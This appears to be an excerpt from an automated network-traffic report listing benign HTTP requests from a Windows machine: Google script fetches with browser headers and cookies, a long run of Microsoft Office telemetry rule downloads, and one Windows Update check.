Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/rs=ACT90oGee_XWq732v0KP_WxvdXHuplL1-Q/m=lOO0Vd,sy8k,P6sQOc?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=bx6c6atABiO-sMwq9MuVEDbU2lMB5tc23-n2xh2eu-1vNO3ppQGEzrdJa-uCFnjZQW6-TfSV-uaj5-PH7bczc--iTHAaBLSpxG62Qyr5h6a9A3IzOAGir6xusKhvd_c4SKwWicrpBcwFF0c3bo70tdy_QycpJahaNx6fT89HgvPd4RgOdsZOY4MQndvldga-82F1GVRebXbWbZJNLjlsVNlsNf0
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/rs=ACT90oGee_XWq732v0KP_WxvdXHuplL1-Q/m=aLUfP?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=bx6c6atABiO-sMwq9MuVEDbU2lMB5tc23-n2xh2eu-1vNO3ppQGEzrdJa-uCFnjZQW6-TfSV-uaj5-PH7bczc--iTHAaBLSpxG62Qyr5h6a9A3IzOAGir6xusKhvd_c4SKwWicrpBcwFF0c3bo70tdy_QycpJahaNx6fT89HgvPd4RgOdsZOY4MQndvldga-82F1GVRebXbWbZJNLjlsVNlsNf0
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBAAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkICEAAAAAAAAAAAAAAAAAAAJEmLmw/d=0/dg=0/br=1/rs=ACT90oGee_XWq732v0KP_WxvdXHuplL1-Q/m=lOO0Vd,sy8k,P6sQOc?xjs=s4 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; OGPC=19037049-1:; NID=519=bx6c6atABiO-sMwq9MuVEDbU2lMB5tc23-n2xh2eu-1vNO3ppQGEzrdJa-uCFnjZQW6-TfSV-uaj5-PH7bczc--iTHAaBLSpxG62Qyr5h6a9A3IzOAGir6xusKhvd_c4SKwWicrpBcwFF0c3bo70tdy_QycpJahaNx6fT89HgvPd4RgOdsZOY4MQndvldga-82F1GVRebXbWbZJNLjlsVNlsNf0
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nXZkSH4goDyyokB&MD=w198Tw2D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
